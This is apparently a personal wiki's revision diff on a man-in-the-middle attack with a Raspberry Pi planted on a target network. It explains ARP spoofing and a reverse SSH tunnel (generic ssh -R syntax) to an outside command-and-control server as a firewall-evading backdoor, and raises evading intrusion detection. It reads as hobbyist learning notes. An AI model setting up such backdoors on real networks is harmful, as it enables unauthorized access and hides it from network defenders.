MITM: Difference between revisions

From charlesreid1
Line 26: Line 26:
===Getting a Reverse Shell to the Pi===
===Getting a Reverse Shell to the Pi===


How to control the Pi once it is placed on a target network? SSH is an obvious way.
See [[RaspberryPi/Reverse SSH]] page for instructions on creating a startup executable on the Raspberry Pi that will create a reverse SSH connection to an outside command and control server. This gives you a backdoor ssh shell onboard the Raspberry Pi. Hooray!
 
Incoming SSH connections can/will be blocked by firewalls or other security measures.
Reverse SSH is a good alternative to gain an SSH shell.
 
Reverse SSH: instead of the command and control server connecting to the Raspberry Pi, the Raspberry Pi initiates the connection to the command and control server. This is the same technique used by many backdoor programs.
 
===SSH Command===
 
The command and control server listens for the Pi. When the Pi is online, it calls the ssh command and connects to the remote command and control server.
 
Normally, when you SSH to a machine, you execute a command like:
 
<pre>
$ ssh user@remoteserver
</pre>
 
But if you use the <code>-R</code> flag, it enables a reverse connection to the listener.
 
<pre>
$ ssh  -R  [bind_address:]port:host:hostport  username@remoteserver
</pre>
 
Let's ignore <code>bind_address</code> for now.
 
The port indicates which port on your Raspberry Pi you want to use to get out of the network. Port 22 is the standard SSH port, but this may not be open on the network firewall that your Pi is on. Pick a port you know will be open and use that for <code>port</code>.
 
<code>host</code> indicates the destination for the tunnel. Once we SSH from the Raspberry Pi into the command and control server, our tunnel is entirely local. So we create a local tunnel from <code>port</code> to <code>hostport</code>. And our host is <code>localhost</code>.
 
Finally, the <code>username@remoteserver</code> enables us to create an SSH connection to the remote server in the first place.
 
 
 
 


===Circumventing IDS===
===Circumventing IDS===

Revision as of 06:02, 4 August 2015

What It Is

A man-in-the-middle attack is a general concept from encryption. It consists of two parties, Alice and Bob, trying to have an encrypted conversation. However, it is foiled by an attacker, Eve, who gets in the middle. This means that Alice and Eve communicate with one encryption key, while Bob and Eve communicate with another key.

Wired Network

Trying Man in the Middle attack with ARP spoofing on a wired network. The configuration: 

+----[Target laptop]
|
|      +---[Raspberry Pi]
|      |
|      |
[Router]

How It Will Work

This (wired) man in the middle attack will work by using the Pi to spoof the MAC address of the target.

Preparing the Pi

First, plug the Pi into the router.

Getting a Reverse Shell to the Pi

See RaspberryPi/Reverse SSH page for instructions on creating a startup executable on the Raspberry Pi that will create a reverse SSH connection to an outside command and control server. This gives you a backdoor ssh shell onboard the Raspberry Pi. Hooray!

Circumventing IDS

Intrusion detection systems can detect SSH traffic based on the traffic looking different, regardless of what port.

Wireless Network

Retrieved from "https://charlesreid1.com/w/index.php?title=MITM&oldid=7612"